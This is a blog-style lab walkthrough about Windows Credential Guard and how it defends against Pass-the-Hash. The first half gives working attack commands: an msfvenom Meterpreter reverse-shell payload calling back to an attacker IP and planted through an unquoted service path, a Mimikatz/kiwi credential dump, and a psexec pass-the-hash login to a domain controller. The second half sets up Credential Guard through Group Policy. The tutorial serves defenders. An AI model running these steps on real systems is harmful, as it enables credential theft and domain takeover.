Pass the Hash (PtH) vs Credential Guard

The first part is 'Pass the Hash', sadly its not what your thinking, put the bong away......

 

From a compromised client, the NTLM hash of a Domain account will be dumped and passed to the Domain Controller, its then possible to execute commands directly on the DC, this will allow the creation of a 'Golden Ticket' for example. Cracking passwords takes time and effort, with no guarantee of success. The NTLM Hash can be extracted from the LSA process and simply passed to another client or Domain Controller authenticating the account without knowing the password hence 'Pass-the-Hash'.

This time and due to some poor behaviour by the IT Admin, we've been a little naughty and the client has already been successfully compromised with an Un-Quoted path vulnerability and malware. The initial attack compromised a single Windows 10 client, its been possible to move laterally from client to client looking for an account with elevated privileges. Finally the golden goose, a Domain Admin, logged on to a client, muppet.

Environment;

Domain Controller is a 2012 R2 @ 10.1.1.1 with a fqdn of sh.loc

The client is Dell XPS with TPM running  Windows 10 x64 2004 @ 10.1.1.109

The attacker is using Kali 2020.4 @ 10.1.1.100

The following Metasploit command was used to create the malware used in the compromise. 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.100 LPORT=4455 -f exe -o /root/Desktop/Phishing.exe

Logon to Kali and open a terminal shell to receive the reverse shell.

Type 'msfconsole' to start Metasploit, then:

set payload windows/meterpreter/reverse_tcp

set LPORT 4455

set LHOST 10.1.1.100 (or the IP address of Kali)

run

 

Logon to the Windows 10 client and replace the GoogleUpdater.exe with Phishing.exe to replicate an 'UnQuoted Path' vulnerability.

Either logoff or restart the Windows 10 client.

Now logon as a 'User', the Google Update service will try and start, executing the dodgy .exe

A reverse shell with 'System' privileges will be initiated.

This step is not necessary and is just for the demo.

shell

whoami

exit

The current reverse shell process is x86 and before launching Mimikatz it needs to be migrated to x64.

Ensure your in the Meterpreter if you enter 'Shell' by typing 'Sessions #id'.

ps | grep spool

Make a note of the PID and then run migrate replacing the example below with the PID displayed on your system.

migrate 2808 

The reverse shell has been migrated to x64 process, this is to ensure Mimikatz's full functionality.

To load Mimikatz from Metapreter type load kiwi

Jump back on to the Windows 10 client, elevate PowerShell as a Domain privileged account. SHAdmin, in this case is also Domain Admin. Those who think this is a bit conceited should get out more, this is common practice.

Back to Kali.

 

To dump the NTLM hashes of the Domain account run creds_all

Copy to clipboard the NTLM hash for the SHAdmin.

Look closely at the image below, the User and SHAdmin share the same password, the NTLM hashes match. The plain text password has been captured as Mimikatz was already running when PowerShell was elevated.

Type background

To abuse the NTLM hash and pass to the Domain Controller another Metasploit module is required.

use exploit windows/smb/psexec

Set the Domain Controllers IP set RHOST 10.1.1.1

Set the IP of Kali set LHOST 10.1.1.100

Set an accessible share on the Domain Controller set SHARE C$

Set the Domain set SMBDomain sh

Set the account that will be used set SMBUser shadmin

Set the NTLM hash, this will need padding with 32 numbers, I've seen zero's being used however I prefer 1 through 10 * 3 with an additional 12 tagged to the end.

set SMBPass 12345678901234567890123456789012:8c3efc486704d2ee71af14d86c

Options to review the settings.

Exploit

Type sysinfo to confirm the successful execution of 'Pass the Hash'.

It would now be possible to execute commands directly on the Domain Controller.

To confirm 'Pass the Hash' was actually responsible the NTLM hash was altered, now its wrong and I tried again. As expected, it's not possible to connect to the Domain Controller.

Before moving on to Credential Guard its important to understand the default Windows configuration. The Local Security Authority (LSA) process is responsible for user authentication, storing password hashes and a bunch of other services and is susceptible to hacking tools extracting the password hashes from memory, given System or Administrative rights. 

Windows Defender Credential Guard uses Virtualized Based Security (VBS) to isolate the LSA protecting Domain Authentication protocols Kerberos and NTLM, preventing access from the System and Administrators. 

Hardware and software requirements:

  • Windows 10 or Server 2016.

  • Support for Virtualization-based security (required).

  • Secure boot (required).

  • Trusted Platform Module (preferred - TPM versions 1.2 and 2.0 are supported).

  • UEFI lock (preferred - prevents attacker from disabling with a simple registry key change).

 

The Virtualization-based security requires:

  • 64-bit CPU.

  • CPU virtualization extensions plus extended page tables.

  • Windows hypervisor (does not require Hyper-V Windows Feature to be installed).

What's not supported:

  • Local Accounts are not protected.

  • Single Sign-On (SSO) is not longer possible with NTLMv1, MS-CHAPv2, Digest, and CredSSP.

  • Kerberos does not allow unconstrained Kerberos delegation or DES encryption, not only for signed-in credentials, but also prompted or saved credentials.

  • Does not support being implemented on Domain Controllers.

There's links at bottom of the page for Credential Guard and Pass the Hash, a little bedtime reading.

The client is a Dell XPS and meets all the VBS requirements with Windows 10 x64 2004 installed and is a member of the sh.loc domain.

 

To confirm the status of VBS and Credential Guard type 'msinfo32' at the run command.

VBS and Credential Guard are not enabled.

 

From the Domain Controller edit a Group Policy that's assigned to the Workstation OU and navigate to: 

'Computer Configuration > Administrative Templates > System > Device Guard'.

Enable 'Turn on Virtualization Based Security'.

Select Platform Security Level: = 'Secure Boot and DMA Protection'

Virtualization Based Protection: = 'Code Integrity = 'Enable without lock'

(Enable with lock - prevents any remote change including via GPO, requiring a visit to all affected workstations )

Credential Guard Configuration: = 'Enable without lock'

(Enable with lock - prevents any remote change including via GPO, requiring a visit to all affected workstations )

Secure Launch Configuration: = 'Not Configured'

(Securing the boot chain and not required for Credential Guard)

Ultimately the 'Enable with lock' is recommended otherwise Credential Guard can be remotely disabled by an attacker. However thoroughly test as testing highlighted issues with Windows 10 x64 2004 when configured with 'Enable with lock'. There were issues accessing the Start Menu and loading profiles.  

On the client run 'gpupdate /force' and then reboot.

Log on with Administrative privileges and run 'msinfo32'.

VBS and Credential Guard are enabled and running.

The new isolated and virtualized LSA, 'lsaiso' service is running.

And finally in Task Manager 'Credential Guard & Key Guard' process is running.

Now repeat the Un-Quoted path attack, loading Kiwi and dumping all hashes with 'creds_all' command.

This time around there are no Domain hashes to steel to pass.

Credential Guard securely isolating the LSA process is the clear winner and does prevent the recovery of domain hashes from memory. However it doesn't prevent 'Pass the Hash' itself, if the attacker uses another technique to steal the password hashes, for example using Responder (LMNR) the hashes can be passed. Credential Guard is another layer to add to the defence of the system, making just that bit harder for the attacker. Lets not forget the cause of this attack an Administrator\Domain Admin logging on to a client infected with malware. Domain Admin and privilege users should never logon to clients.

 

Further Reading:

Credential Guard How it Works

Credential Guard Limits

Credential Guard Requirements

SANs PtH

BlackHat Defeating PtH

Secure Launch Configuration